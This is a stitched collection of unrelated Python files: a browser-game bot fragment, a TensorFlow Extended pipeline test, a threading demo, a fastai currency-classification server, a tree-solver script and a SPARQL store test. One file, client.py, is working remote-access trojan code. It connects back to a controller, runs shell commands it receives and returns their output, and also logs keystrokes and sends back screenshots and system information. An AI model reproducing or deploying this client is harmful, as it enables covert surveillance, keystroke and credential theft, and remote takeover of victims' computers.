def start_adventures(self, interval: int = 100, health: int = 50) -> None:
Thread(target=adventures_thread, args=[
self.browser, interval, health]).start()
# todo implement
def upgrade_slot(self, village: int, slot: int) -> None:
log("upgrading slots is under construction - check for updates")
if slot > 19:
log("upgrading buildings is still under construction")
return
def start_farming(self, village: int, farmlists: list, interval: int) -> None:
Thread(target=start_farming_thread, args=[
self.browser, village, farmlists, interval]).start()
def start_custom_farmlist(self, reload: bool = False) -> None:
Thread(target=start_custom_farmlist_thread,
args=[self.browser, reload]).start()
def sort_danger_farms(self, farmlists: list, to_list: int, red: bool, yellow: bool, interval: int = 300) -> None:
Thread(target=sort_danger_farms_thread, args=[
self.browser, farmlists, to_list, red, yellow, interval]).start()
def dodge_attack(self, village: int, interval: int = 600, save_resources: bool = False, units: list = [], target: list = [], units_train: list = []) -> None:
# check dependencies for units
if units:
if target == None:
log("please provide a target to send your troops for saving")
return
# check dependencies for resources
if save_resources:
if units_train == None:
log("please provide the units that want to train for saving the resources")
return
Thread(target=check_for_attack_thread, args=[
self.browser, village, interval, units, target, save_resources, units_train]).start()
def upgrade_units_smithy(self, village: int, units: list, interval: int = 1000) -> None:
Thread(target=upgrade_units_smithy_thread, args=[
self.browser, village, units, interval]).start()
def celebrate(self, villages: list, interval: int = 1000) -> None:
# TODO implement type == 1 for big celebrations
celebration_type = 0
Thread(target=celebration_thread, args=[self.browser, villages, celebration_type, interval]).start()
def start_building(self, village: int, file_name: str, interval: int = 1800) -> None:
Thread(target=master_builder_thread, args=[
self.browser, village, file_name, interval]).start()
# def robber_hideout(self, interval: int = 600) -> None:
# Thread(target=robber_hideout_thread, args=[
# self.browser, interval]).start()
|
pipeline_ops_test.py
|
# Copyright 2020 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for tfx.orchestration.experimental.core.pipeline_ops."""
import base64
import copy
import os
import threading
import time
from absl.testing.absltest import mock
import tensorflow as tf
from tfx.orchestration import metadata
from tfx.orchestration.experimental.core import async_pipeline_task_gen
from tfx.orchestration.experimental.core import pipeline_ops
from tfx.orchestration.experimental.core import status as status_lib
from tfx.orchestration.experimental.core import sync_pipeline_task_gen
from tfx.orchestration.experimental.core import task as task_lib
from tfx.orchestration.experimental.core import task_gen_utils
from tfx.orchestration.experimental.core import task_queue as tq
from tfx.orchestration.experimental.core import test_utils
from tfx.orchestration.portable.mlmd import execution_lib
from tfx.proto.orchestration import pipeline_pb2
from tfx.utils import test_case_utils as tu
from ml_metadata.proto import metadata_store_pb2
def _test_pipeline(pipeline_id,
execution_mode: pipeline_pb2.Pipeline.ExecutionMode = (
pipeline_pb2.Pipeline.ASYNC)):
pipeline = pipeline_pb2.Pipeline()
pipeline.pipeline_info.id = pipeline_id
pipeline.execution_mode = execution_mode
return pipeline
class PipelineOpsTest(tu.TfxTest):
def setUp(self):
super(PipelineOpsTest, self).setUp()
pipeline_root = os.path.join(
os.environ.get('TEST_UNDECLARED_OUTPUTS_DIR', self.get_temp_dir()),
self.id())
# Makes sure multiple connections within a test always connect to the same
# MLMD instance.
metadata_path = os.path.join(pipeline_root, 'metadata', 'metadata.db')
self._metadata_path = metadata_path
connection_config = metadata.sqlite_metadata_connection_config(
metadata_path)
connection_config.sqlite.SetInParent()
self._mlmd_connection = metadata.Metadata(
connection_config=connection_config)
def test_initiate_pipeline_start(self):
with self._mlmd_connection as m:
# Initiate a pipeline start.
pipeline1 = _test_pipeline('pipeline1')
pipeline_ops.initiate_pipeline_start(m, pipeline1)
# Initiate another pipeline start.
pipeline2 = _test_pipeline('pipeline2')
pipeline_ops.initiate_pipeline_start(m, pipeline2)
# No error raised => context/execution types exist.
m.store.get_context_type(pipeline_ops._ORCHESTRATOR_RESERVED_ID)
m.store.get_execution_type(pipeline_ops._ORCHESTRATOR_RESERVED_ID)
# Verify MLMD state.
contexts = m.store.get_contexts_by_type(
pipeline_ops._ORCHESTRATOR_RESERVED_ID)
self.assertLen(contexts, 2)
self.assertCountEqual([
pipeline_ops._orchestrator_context_name(
task_lib.PipelineUid.from_pipeline(pipeline1)),
pipeline_ops._orchestrator_context_name(
task_lib.PipelineUid.from_pipeline(pipeline2))
], [c.name for c in contexts])
for context in contexts:
executions = m.store.get_executions_by_context(context.id)
self.assertLen(executions, 1)
self.assertEqual(metadata_store_pb2.Execution.NEW,
executions[0].last_known_state)
retrieved_pipeline = pipeline_pb2.Pipeline()
retrieved_pipeline.ParseFromString(
base64.b64decode(executions[0].properties[
pipeline_ops._PIPELINE_IR].string_value))
expected_pipeline_id = (
pipeline_ops._pipeline_uid_from_context(context).pipeline_id)
self.assertEqual(
_test_pipeline(expected_pipeline_id), retrieved_pipeline)
def test_initiate_pipeline_start_new_execution(self):
with self._mlmd_connection as m:
pipeline1 = _test_pipeline('pipeline1')
pipeline_ops.initiate_pipeline_start(m, pipeline1)
# Error if attempted to initiate when old one is active.
with self.assertRaises(status_lib.StatusNotOkError) as exception_context:
pipeline_ops.initiate_pipeline_start(m, pipeline1)
self.assertEqual(status_lib.Code.ALREADY_EXISTS,
exception_context.exception.code)
# Fine to initiate after the previous one is inactive.
executions = m.store.get_executions_by_type(
pipeline_ops._ORCHESTRATOR_RESERVED_ID)
self.assertLen(executions, 1)
executions[0].last_known_state = metadata_store_pb2.Execution.COMPLETE
m.store.put_executions(executions)
execution = pipeline_ops.initiate_pipeline_start(m, pipeline1)
self.assertEqual(metadata_store_pb2.Execution.NEW,
execution.last_known_state)
# Verify MLMD state.
contexts = m.store.get_contexts_by_type(
pipeline_ops._ORCHESTRATOR_RESERVED_ID)
self.assertLen(contexts, 1)
self.assertEqual(
pipeline_ops._orchestrator_context_name(
task_lib.PipelineUid.from_pipeline(pipeline1)), contexts[0].name)
executions = m.store.get_executions_by_context(contexts[0].id)
self.assertLen(executions, 2)
self.assertCountEqual([
metadata_store_pb2.Execution.COMPLETE,
metadata_store_pb2.Execution.NEW
], [e.last_known_state for e in executions])
def test_initiate_pipeline_stop(self):
with self._mlmd_connection as m:
pipeline1 = _test_pipeline('pipeline1')
pipeline_ops.initiate_pipeline_start(m, pipeline1)
pipeline_uid = task_lib.PipelineUid.from_pipeline(pipeline1)
pipeline_ops._initiate_pipeline_stop(m, pipeline_uid)
# Verify MLMD state.
executions = m.store.get_executions_by_type(
pipeline_ops._ORCHESTRATOR_RESERVED_ID)
self.assertLen(executions, 1)
execution = executions[0]
self.assertEqual(
1,
execution.custom_properties[pipeline_ops._STOP_INITIATED].int_value)
def test_stop_pipeline_non_existent(self):
with self._mlmd_connection as m:
# Stop pipeline without creating one.
with self.assertRaises(status_lib.StatusNotOkError) as exception_context:
pipeline_ops.stop_pipeline(
m, task_lib.PipelineUid(pipeline_id='foo', pipeline_run_id=None))
self.assertEqual(status_lib.Code.NOT_FOUND,
exception_context.exception.code)
# Initiate pipeline start and mark it completed.
pipeline1 = _test_pipeline('pipeline1')
execution = pipeline_ops.initiate_pipeline_start(m, pipeline1)
pipeline_uid = task_lib.PipelineUid.from_pipeline(pipeline1)
pipeline_ops._initiate_pipeline_stop(m, pipeline_uid)
execution.last_known_state = metadata_store_pb2.Execution.COMPLETE
m.store.put_executions([execution])
# Try to initiate stop again.
with self.assertRaises(status_lib.StatusNotOkError) as exception_context:
pipeline_ops.stop_pipeline(m, pipeline_uid)
self.assertEqual(status_lib.Code.ALREADY_EXISTS,
exception_context.exception.code)
def test_stop_pipeline_wait_for_inactivation(self):
with self._mlmd_connection as m:
pipeline1 = _test_pipeline('pipeline1')
execution = pipeline_ops.initiate_pipeline_start(m, pipeline1)
def _inactivate(execution):
time.sleep(2.0)
with pipeline_ops._PIPELINE_OPS_LOCK:
execution.last_known_state = metadata_store_pb2.Execution.COMPLETE
m.store.put_executions([execution])
thread = threading.Thread(
target=_inactivate, args=(copy.deepcopy(execution),))
thread.start()
pipeline_ops.stop_pipeline(
m, task_lib.PipelineUid.from_pipeline(pipeline1), timeout_secs=5.0)
thread.join()
def test_stop_pipeline_wait_for_inactivation_timeout(self):
with self._mlmd_connection as m:
pipeline1 = _test_pipeline('pipeline1')
pipeline_ops.initiate_pipeline_start(m, pipeline1)
with self.assertRaisesRegex(
status_lib.StatusNotOkError,
'Timed out.*waiting for execution inactivation.'
) as exception_context:
pipeline_ops.stop_pipeline(
m, task_lib.PipelineUid.from_pipeline(pipeline1), timeout_secs=1.0)
self.assertEqual(status_lib.Code.DEADLINE_EXCEEDED,
exception_context.exception.code)
@mock.patch.object(sync_pipeline_task_gen, 'SyncPipelineTaskGenerator')
@mock.patch.object(async_pipeline_task_gen, 'AsyncPipelineTaskGenerator')
def test_generate_tasks_async_active_pipelines(self, mock_async_task_gen,
mock_sync_task_gen):
with self._mlmd_connection as m:
# One active pipeline.
pipeline1 = _test_pipeline('pipeline1')
pipeline_ops.initiate_pipeline_start(m, pipeline1)
# Another active pipeline (with previously completed execution).
pipeline2 = _test_pipeline('pipeline2')
execution2 = pipeline_ops.initiate_pipeline_start(m, pipeline2)
execution2.last_known_state = metadata_store_pb2.Execution.COMPLETE
m.store.put_executions([execution2])
execution2 = pipeline_ops.initiate_pipeline_start(m, pipeline2)
# Inactive pipelines should be ignored.
pipeline3 = _test_pipeline('pipeline3')
execution3 = pipeline_ops.initiate_pipeline_start(m, pipeline3)
execution3.last_known_state = metadata_store_pb2.Execution.COMPLETE
m.store.put_executions([execution3])
# For active pipelines pipeline1 and pipeline2, there are a couple of
# active executions.
def _exec_node_tasks():
for pipeline_id in ('pipeline1', 'pipeline2'):
yield [
test_utils.create_exec_node_task(
node_uid=task_lib.NodeUid(
pipeline_uid=task_lib.PipelineUid(
pipeline_id=pipeline_id, pipeline_run_id=None),
node_id='Transform')),
test_utils.create_exec_node_task(
node_uid=task_lib.NodeUid(
pipeline_uid=task_lib.PipelineUid(
pipeline_id=pipeline_id, pipeline_run_id=None),
node_id='Trainer'))
]
mock_async_task_gen.return_value.generate.side_effect = _exec_node_tasks()
task_queue = tq.TaskQueue()
pipeline_ops.generate_tasks(m, task_queue)
self.assertEqual(2, mock_async_task_gen.return_value.generate.call_count)
mock_sync_task_gen.assert_not_called()
# Verify that tasks are enqueued in the expected order.
for node_id in ('Transform', 'Trainer'):
task = task_queue.dequeue()
task_queue.task_done(task)
self.assertTrue(task_lib.is_exec_node_task(task))
self.assertEqual(node_id, task.node_uid.node_id)
self.assertEqual('pipeline1', task.node_uid.pipeline_uid.pipeline_id)
for node_id in ('Transform', 'Trainer'):
task = task_queue.dequeue()
task_queue.task_done(task)
self.assertTrue(task_lib.is_exec_node_task(task))
self.assertEqual(node_id, task.node_uid.node_id)
self.assertEqual('pipeline2', task.node_uid.pipeline_uid.pipeline_id)
self.assertTrue(task_queue.is_empty())
@mock.patch.object(sync_pipeline_task_gen, 'SyncPipelineTaskGenerator')
@mock.patch.object(async_pipeline_task_gen, 'AsyncPipelineTaskGenerator')
@mock.patch.object(task_gen_utils, 'generate_task_from_active_execution')
def test_stop_initiated_async_pipelines(self, mock_gen_task_from_active,
mock_async_task_gen,
mock_sync_task_gen):
with self._mlmd_connection as m:
pipeline1 = _test_pipeline('pipeline1')
pipeline1.nodes.add().pipeline_node.node_info.id = 'Transform'
pipeline1.nodes.add().pipeline_node.node_info.id = 'Trainer'
pipeline1.nodes.add().pipeline_node.node_info.id = 'Evaluator'
pipeline_ops.initiate_pipeline_start(m, pipeline1)
pipeline1_execution = pipeline_ops._initiate_pipeline_stop(
m, task_lib.PipelineUid.from_pipeline(pipeline1))
task_queue = tq.TaskQueue()
# For the stop-initiated pipeline, "Transform" execution task is in queue,
# "Trainer" has an active execution in MLMD but no task in queue,
# "Evaluator" has no active execution.
task_queue.enqueue(
test_utils.create_exec_node_task(
node_uid=task_lib.NodeUid(
pipeline_uid=task_lib.PipelineUid(
pipeline_id='pipeline1', pipeline_run_id=None),
node_id='Transform')))
transform_task = task_queue.dequeue() # simulates task being processed
mock_gen_task_from_active.side_effect = [
test_utils.create_exec_node_task(
node_uid=task_lib.NodeUid(
pipeline_uid=task_lib.PipelineUid(
pipeline_id='pipeline1', pipeline_run_id=None),
node_id='Trainer'),
is_cancelled=True), None, None, None, None
]
pipeline_ops.generate_tasks(m, task_queue)
# There are no active pipelines so these shouldn't be called.
mock_async_task_gen.assert_not_called()
mock_sync_task_gen.assert_not_called()
# Simulate finishing the "Transform" ExecNodeTask.
task_queue.task_done(transform_task)
# CancelNodeTask for the "Transform" ExecNodeTask should be next.
task = task_queue.dequeue()
task_queue.task_done(task)
self.assertTrue(task_lib.is_cancel_node_task(task))
self.assertEqual('Transform', task.node_uid.node_id)
# ExecNodeTask for "Trainer" is next.
task = task_queue.dequeue()
task_queue.task_done(task)
self.assertTrue(task_lib.is_exec_node_task(task))
self.assertEqual('Trainer', task.node_uid.node_id)
self.assertTrue(task_queue.is_empty())
mock_gen_task_from_active.assert_has_calls([
mock.call(
m,
pipeline1,
pipeline1.nodes[1].pipeline_node,
mock.ANY,
is_cancelled=True),
mock.call(
m,
pipeline1,
pipeline1.nodes[2].pipeline_node,
mock.ANY,
is_cancelled=True)
])
self.assertEqual(2, mock_gen_task_from_active.call_count)
# Pipeline execution should continue to be active since active node
# executions were found in the last call to `generate_tasks`.
[execution] = m.store.get_executions_by_id([pipeline1_execution.id])
self.assertTrue(execution_lib.is_execution_active(execution))
# Call `generate_tasks` again; this time there are no more active node
# executions so the pipeline should be marked as cancelled.
pipeline_ops.generate_tasks(m, task_queue)
self.assertTrue(task_queue.is_empty())
[execution] = m.store.get_executions_by_id([pipeline1_execution.id])
self.assertEqual(metadata_store_pb2.Execution.CANCELED,
execution.last_known_state)
def test_to_status_not_ok_error_decorator(self):
@pipeline_ops._to_status_not_ok_error
def fn1():
raise RuntimeError('test error 1')
@pipeline_ops._to_status_not_ok_error
def fn2():
raise status_lib.StatusNotOkError(
code=status_lib.Code.ALREADY_EXISTS, message='test error 2')
with self.assertRaisesRegex(status_lib.StatusNotOkError,
'test error 1') as ctxt:
fn1()
self.assertEqual(status_lib.Code.UNKNOWN, ctxt.exception.code)
with self.assertRaisesRegex(status_lib.StatusNotOkError,
'test error 2') as ctxt:
fn2()
self.assertEqual(status_lib.Code.ALREADY_EXISTS, ctxt.exception.code)
if __name__ == '__main__':
tf.test.main()
|
thread.py
|
import threading
import multiprocessing
"""
@desc :多线程
@author Pings
@date 2018/05/15
@version V1.0
"""
# **多线程无法利用多核心cpu
def loop():
x = 0
while True:
x = x ^ 1
print(threading.current_thread().name, x)
for i in range(multiprocessing.cpu_count()):
t = threading.Thread(target=loop)
t.start()
|
client.py
|
class CLIENT:
SOCK = None
KEY = ")J@NcRfU"
KEYLOGGER_STATUS = False
KEYLOGGER_STROKES = ""
def __init__(self, _ip, _pt):
self.ipaddress = _ip
self.port = _pt
def send_data(self, tosend, encode=True):
if encode:
self.SOCK.send(base64.encodebytes(tosend.encode('utf-8')) + self.KEY.encode('utf-8'))
else:
self.SOCK.send(base64.encodebytes(tosend) + self.KEY.encode('utf-8'))
def turn_keylogger(self, status):
def on_press(key):
if not self.KEYLOGGER_STATUS:
return False
key = str(key)
if len(key.strip('\'')) == 1:
self.KEYLOGGER_STROKES += key.strip('\'')
else:
self.KEYLOGGER_STROKES += ("[" + key + "]")
def on_release(key):
if not self.KEYLOGGER_STATUS:
return False
def logger():
with Listener(on_press=on_press, on_release=on_release) as listener:
listener.join()
if status:
if not self.KEYLOGGER_STATUS:
self.KEYLOGGER_STATUS = True
t = threading.Thread(target=logger)
t.daemon = True
t.start()
else:
self.KEYLOGGER_STATUS = False
def execute(self, command):
data = command.decode('utf-8').split(":")
if data[0] == "shell":
#print("Executing Shell: " + data[1])
toexecute = data[1].rstrip(" ").lstrip(" ")
toexecute = " ".join(toexecute.split())
if toexecute.split(" ")[0] == "cd":
try:
os.chdir(toexecute.split(" ")[1])
self.send_data("")
except:
self.send_data("Error while changing directory!")
else:
try:
comm = subprocess.Popen(data[1], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
output, errors = comm.communicate()
self.send_data(output + errors)
except FileNotFoundError:
self.send_data("No Such File or Directory")
elif data[0] == "keylogger":
#print("Executing Keylogger: " + data[1])
if data[1] == "on":
self.turn_keylogger(True)
self.send_data("")
elif data[1] == "off":
self.turn_keylogger(False)
self.send_data("")
elif data[1] == "dump":
self.send_data(self.KEYLOGGER_STROKES)
elif data[0] == "sysinfo":
#print("Executing Sysinfo: " + data[1])
sysinfo = SYSINFO()
self.send_data(sysinfo.get_data())
elif data[0] == "screenshot":
#print("Executing Screenshot: " + data[1])
screenshot = SCREENSHOT()
self.send_data(screenshot.get_data(), encode=False)
def acceptor(self):
data = ""
chunk = b""
while True:
chunk = self.SOCK.recv(4096)
if not chunk:
break
data += chunk.decode('utf-8')
if self.KEY.encode('utf-8') in chunk:
data = data.rstrip(self.KEY)
t = threading.Thread(target=self.execute, args=(base64.decodebytes(data.encode('utf-8')),))
t.daemon = True
t.start()
data = ""
def engage(self):
self.SOCK = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
while True:
try:
print("Connecting To: %s:%d" % (self.ipaddress, self.port))
self.SOCK.connect((self.ipaddress, self.port))
except:
print("Failed to Connect. Trying Again!")
time.sleep(5)
continue
self.acceptor()
|
server.py
|
from starlette.applications import Starlette
from starlette.responses import HTMLResponse, JSONResponse
from starlette.staticfiles import StaticFiles
from starlette.middleware.cors import CORSMiddleware
import uvicorn, aiohttp, asyncio
from io import BytesIO
import requests, hashlib
from fastai import *
from fastai.vision import *
from google.cloud import storage
model_name = 'single-class'
model_name = 'multi-class'
model_file_id_multi = '16HFcpNFgn465xyrapyIuDSR0YrciJ6pd'
model_file_id_single = '19xqtsyusFddcSkdCm1hlhW3y6ljGck5L'
model_file_id = model_file_id_multi
classes_multi = ['1', '10', '100', '20', '200', '5', '50', '500', 'euro', 'usd']
classes_single = ['euro/10',
'euro/100',
'euro/20',
'euro/200',
'euro/5',
'euro/50',
'euro/500',
'usd/1',
'usd/10',
'usd/100',
'usd/20',
'usd/5',
'usd/50']
classes = classes_multi
path = Path(__file__).parent
bucket_name = "iris-user-uploads"
app = Starlette()
app.add_middleware(CORSMiddleware, allow_origins=['*'], allow_headers=['X-Requested-With', 'Content-Type'])
def download_file_from_google_drive(id, destination):
if destination.exists():
return
print("Downloading model from Google Drive",end="")
URL = "https://docs.google.com/uc?export=download"
session = requests.Session()
response = session.get(URL, params = { 'id' : id }, stream = True)
token = get_confirm_token(response)
if token:
params = { 'id' : id, 'confirm' : token }
response = session.get(URL, params = params, stream = True)
save_response_content(response, destination)
print("done.")
def get_confirm_token(response):
for key, value in response.cookies.items():
if key.startswith('download_warning'):
return value
return None
def save_response_content(response, destination):
CHUNK_SIZE = 32768
with open(destination, "wb") as f:
for chunk in response.iter_content(CHUNK_SIZE):
if chunk: # filter out keep-alive new chunks
print(".",end="")
f.write(chunk)
async def setup_learner():
model_file_name = Path('models')/f'{model_name}.pkl'
download_file_from_google_drive(model_file_id, path/model_file_name)
try:
learn = load_learner(path, model_file_name)
return learn
except RuntimeError as e:
if len(e.args) > 0 and 'CPU-only machine' in e.args[0]:
print(e)
message = "\n\nThis model was trained with an old version of fastai and will not work in a CPU environment.\n\nPlease update the fastai library in your training environment and export your model again.\n\nSee instructions for 'Returning to work' at https://course.fast.ai."
raise RuntimeError(message)
else:
raise
def upload_blob(bucket_name, img_blob,filename):
"""Uploads a file to the GCS bucket."""
storage_client = storage.Client()
bucket = storage_client.get_bucket(bucket_name)
print('Uploading user image.')
destination_blob_name = filename+"-"+hashlib.md5(img_blob).hexdigest()+".png"
print(destination_blob_name)
blob = bucket.blob(destination_blob_name)
print(blob.exists(storage_client))
if not blob.exists(storage_client):
blob.upload_from_string(img_blob,content_type='image/png')
print('File uploaded.'.format(
destination_blob_name))
else:
print('File already uploaded')
loop = asyncio.get_event_loop()
tasks = [asyncio.ensure_future(setup_learner())]
learn = loop.run_until_complete(asyncio.gather(*tasks))[0]
loop.close()
@app.route('/')
def index(request):
html = path/'view'/'index.html'
return HTMLResponse(html.open().read())
@app.route('/status')
def status(request):
status = {"online":True}
return JSONResponse(status)
from threading import Thread
@app.route('/analyze', methods=['POST'])
async def analyze(request):
data = await request.form()
img_bytes = await (data['file'].read())
img = open_image(BytesIO(img_bytes))
prediction= learn.predict(img)
response = {'result': str(prediction[0]),
'classes': str(classes),
'activations': str(prediction[2])}
if ("skip_upload" in data) and (data['skip_upload']=="true"):
response['skip_upload']=True
else:
filename="pred-"+str(prediction[0]).replace(";", "_")
Thread(target=upload_blob, args=(bucket_name, img_bytes,filename)).start()
print(response)
return JSONResponse(response)
if __name__ == '__main__':
if 'serve' in sys.argv: uvicorn.run(app, host='0.0.0.0', port=8080)
|
tree_apx.py
|
#!/usr/bin/env python
"""
Solve FLSA on trees by computing the derivative at one point per time.
From here, the C++ code for tree12.cpp and tree12c.cpp was developed.
A lot of experimental code concerning orderings is included.
"""
import argparse
import sys
import h5py
import numpy as np
import numba
import multiprocessing
from graphidx.timer import Timer
from graphidx.graphviz import show_tree
from .graphio import load_tree
from .bfs import compute_bfs, compute_children, compute_levels, reverse_levels
PRINT_MAX = 10
float_t = "f4"
int_t = "i4"
Node = numba.from_dtype(
np.dtype(
[
# ('id', int_t), # only for debugging
("y", float_t),
("x", float_t),
("deriv", float_t),
("parent", int_t),
]
)
)
double = Node.fields["x"][0]
int64 = Node.fields["parent"][0]
def njit(*argp, **args):
"""Enable/Disable caching for all JIT functions"""
return numba.njit(cache=True, *argp, **args)
def iperm(perm):
"""Return an inverse permutation"""
@njit
def iperm_(perm, iperm):
"""Inverse permuation: Implementation"""
for i, j in enumerate(perm):
iperm[j] = i
return iperm
return iperm_(perm, np.empty_like(perm))
@njit
def init(nodes, y_mid, y, parent, order, iorder):
for i, ii in enumerate(order):
nodes[i].y = y[ii]
nodes[i].x = y_mid
# nodes[i].id = ii
nodes[i].parent = iorder[parent[ii]]
@njit(locals=dict(x=double, a=double, b=double))
def clip(x, a, b):
return max(min(x, b), a)
# @njit(locals=dict(nodes=Node[:], preorder=int64[:], delta=double,
# lam=double, mu=double, c=double, d=double))
def discrete_flsa(nodes, delta, lam, mu=0.5):
n = len(nodes)
for v in nodes:
v.deriv = 2.0 * mu * (v.x - v.y)
# compute derivative
for v in nodes:
p = nodes[v.parent]
if abs(p.x - v.x) < delta:
p.deriv += clip(v.deriv, -lam, +lam)
elif v.x < p.x:
# ==> v.deriv was bigger when v.x == p.x in former iterations
# ==> v.deriv was clipped down to +lam (and stays there)
p.deriv += lam
else:
p.deriv -= lam
# print(' --> % .3f' % p.deriv)
# optimize root node
r = nodes[-1]
c = 0.5 * delta
# print("c:", c)
r.x += c if r.deriv < 0 else -c
# print("r.i", r.i)
# backtracing
for i in range(n - 2, -1, -1):
v = nodes[i]
p = nodes[v.parent]
if abs(p.x - v.x) <= delta: # in same range?
if v.deriv > lam: # usual clipping
v.x -= c
elif v.deriv < -lam:
v.x += c
else:
v.x = p.x
else: # in different ranges
d = v.deriv + (-lam if v.x < p.x else +lam)
v.x += c if d < 0 else -c
# print(' --> % .3f' % v.x)
def discrete_solution(x_opt, x_base, delta):
"""Round optimal continuous solution x_opt to next
discrete solution according to x_base + sgn*delta (sgn in [-1, +1])"""
delta *= 0.5
x_opt = x_opt.flatten()
xr = np.empty(x_opt.shape)
n = len(x_opt)
for i in range(n):
xr[i] = x_base[i]
pos = xr[i] + delta
neg = xr[i] - delta
xr[i] = pos if abs(pos - x_opt[i]) < abs(neg - x_opt[i]) else neg
return xr
def extract_x(nodes, order):
"""Reorder the nodes.x values and return as numpy array"""
@njit
def _extract_x(x, nodes, order):
for i, ii in enumerate(order):
x[ii] = nodes[i].x
return x
return _extract_x(
np.empty(len(nodes), dtype=Node.fields["x"][0].name), nodes, order
)
def process_tree(treeh5, args=None):
"""
Load data from `treeh5`, optimize and print the difference to optimum.
"""
with Timer("Loading Tree"):
tree = load_tree(treeh5)
with h5py.File(treeh5, "r") as io:
y = io["y"][()]
lam = io["lam"][()]
if not isinstance(lam, float):
lam = float(lam[0])
xt = (
io["xt"][()]
if "xt" in io
else io["x++"][()]
if "x++" in io
else None
)
parent = tree.parent
root = tree.root
n = len(tree)
y = y.flatten()
nodes = np.zeros(n, dtype=Node)
nodes = np.rec.array(nodes)
print(f" n={n:,d}".replace(",", "_"))
if args is not None and args.scale_y:
y_min, y_max = y.min(), y.max()
y = y - y_min
if y_max - y_min > 1e-10:
y = y / (y_max - y_min)
y_min, y_max = y.min(), y.max()
if n == 6: # for debugging
y_min, y_max = 0.0, 1.0
y_mid = 0.5 * (y_min + y_max)
delta = 0.5 * (y_max - y_min)
with Timer("Computing Children"):
vc, ci = compute_children(parent)
with Timer("Computing BFS"):
bfs = compute_bfs(vc, ci, root=root)
with Timer("Reverse BFS"):
rbfs = bfs.copy()[::-1]
with h5py.File(treeh5, "r+") as io:
if "bfs" not in io:
with Timer("Write BFS"):
io.create_dataset("bfs", data=bfs)
preorder = bfs.copy()
levels = None
if args is not None and args.use_levels:
with Timer("Computing Levels"):
levels = compute_levels(bfs, parent)
if n <= PRINT_MAX:
if levels is not None:
print(" levels:", levels)
for i in range(len(levels) - 1):
print(" %d:" % i, bfs[levels[i] : levels[i + 1]])
print("\nrlevels:", levels[::-1])
nl = len(levels)
for i in range(len(levels) - 1):
low = levels[nl - i - 2]
upp = levels[nl - i - 1]
print(" %d [%d:%d):" % (i, low, upp), bfs[low:upp])
with Timer("Inverse Order"):
if args is not None and args.use_levels:
postorder = reverse_levels(levels, bfs)
backord = iperm(postorder)[reverse_levels(levels, bfs)][::-1]
else:
postorder = rbfs.copy()
backord = np.arange(n)[::-1]
ipostord = iperm(postorder)
if "i" in Node.fields:
for i, ii in enumerate(postorder):
nodes[i].i = ii
if n <= PRINT_MAX:
vc, ci = compute_children(parent)
print(" children:", vc)
print(" cnums:", ci)
print(" rbfs:", rbfs)
print(" preorder:", preorder)
print("postorder:", postorder)
if levels is not None:
print(" levelord:", reverse_levels(levels, bfs))
print(" backord:", backord)
print(" ipostord:", ipostord)
print(" iorder:", ipostord[preorder])
print("identity?:", postorder[ipostord])
print(" y:", y)
parent = int64(parent)
with Timer("Init ...."):
init(nodes, double(y_mid), double(y), parent, postorder, ipostord)
if n <= PRINT_MAX:
# print(nodes)
print("parent:", parent)
print("access:", ipostord[parent[postorder]])
if "i" in Node.fields:
print("parent:", np.array([nodes[nodes[i].parent].i for i in postorder]))
print(" x0:", nodes.x[ipostord])
with Timer("Iterations:", end="\n"):
for it in range(args.max_iter):
print(it + 1, "...")
if n <= PRINT_MAX:
print("delta:", delta)
if "i" in Node.fields:
print("nodes.i:", nodes.i)
print(" ident?:", nodes.i[ipostord])
xb = nodes.x[ipostord]
discrete_flsa(nodes, delta, lam)
if n <= PRINT_MAX:
if "i" in Node.fields:
print(" i:", nodes.i[ipostord])
print("deriv:", nodes.deriv[ipostord])
print(" y:", nodes.y[ipostord])
x = nodes.x[ipostord]
print(" x:", x)
if xt is not None:
sol = discrete_solution(xt, xb, delta)
print(" sol:", sol)
print(" diff:", sol - x)
if np.abs(sol - x).max() >= 1e-7:
raise RuntimeError("!!!! INTERNAL ERROR !!!!")
delta /= 2
with Timer("Extract solution"):
x = extract_x(nodes, postorder)
if n <= PRINT_MAX:
print(" x:", x)
if xt is not None:
print(" xt:", xt.flatten())
if xt is not None:
print("Norm(x - xt, Inf): ", np.linalg.norm(x - xt.flatten(), np.inf))
if args is not None and args.dot_tree:
with Timer("Show Tree"):
show_tree(parent)
if args is not None and args.show_levels:
def plot():
import matplotlib.pyplot as plt
plt.plot(np.diff(levels))
plt.show()
multiprocessing.Process(target=plot).start()
if __name__ == "__main__":
p = argparse.ArgumentParser(description=__doc__)
p.add_argument(
"-i", "--max-iter", type=int, default=3, help="Number of iterations"
)
p.add_argument(
"-d",
"--dot-tree",
action="store_true",
help="Show the tree (using graphviz)",
)
p.add_argument(
"-L",
"--show-levels",
action="store_true",
help="Show the distribution of tree levels (depth)",
)
p.add_argument(
"-l",
"--use-levels",
action="store_true",
help="Postorder = reverse Levels(BFS)",
)
p.add_argument("-s", "--scale-y", action="store_true", help="Scale y to [0,1]")
p.add_argument("-v", "--verbose", action="store_true", help="Be more verbose")
p.add_argument("treeh5", type=str, nargs="*", help="Tree(s) to process")
args = p.parse_args()
np.set_printoptions(precision=3)
for t in args.treeh5:
print("Processing", t, file=sys.stderr)
if args.verbose:
PRINT_MAX = 20
process_tree(t, args)
# Local Variables:
# compile-command: "python -m treelas.tree_apx ../../data/test/tree.mini.h5"
# End:
|
test_sparqlstore.py
|
from rdflib import Graph, URIRef, Literal
from urllib.request import urlopen
import unittest
from nose import SkipTest
from http.server import BaseHTTPRequestHandler, HTTPServer
import socket
from threading import Thread
from unittest.mock import patch
from rdflib.namespace import RDF, XSD, XMLNS, FOAF, RDFS
from rdflib.plugins.stores.sparqlstore import SPARQLConnector
from . import helper
from .testutils import MockHTTPResponse, SimpleHTTPMock, ctx_http_server
try:
assert len(urlopen("http://dbpedia.org/sparql").read()) > 0
except:
raise SkipTest("No HTTP connection.")
class SPARQLStoreDBPediaTestCase(unittest.TestCase):
store_name = "SPARQLStore"
path = "http://dbpedia.org/sparql"
storetest = True
create = False
def setUp(self):
self.graph = Graph(store="SPARQLStore")
self.graph.open(self.path, create=self.create)
ns = list(self.graph.namespaces())
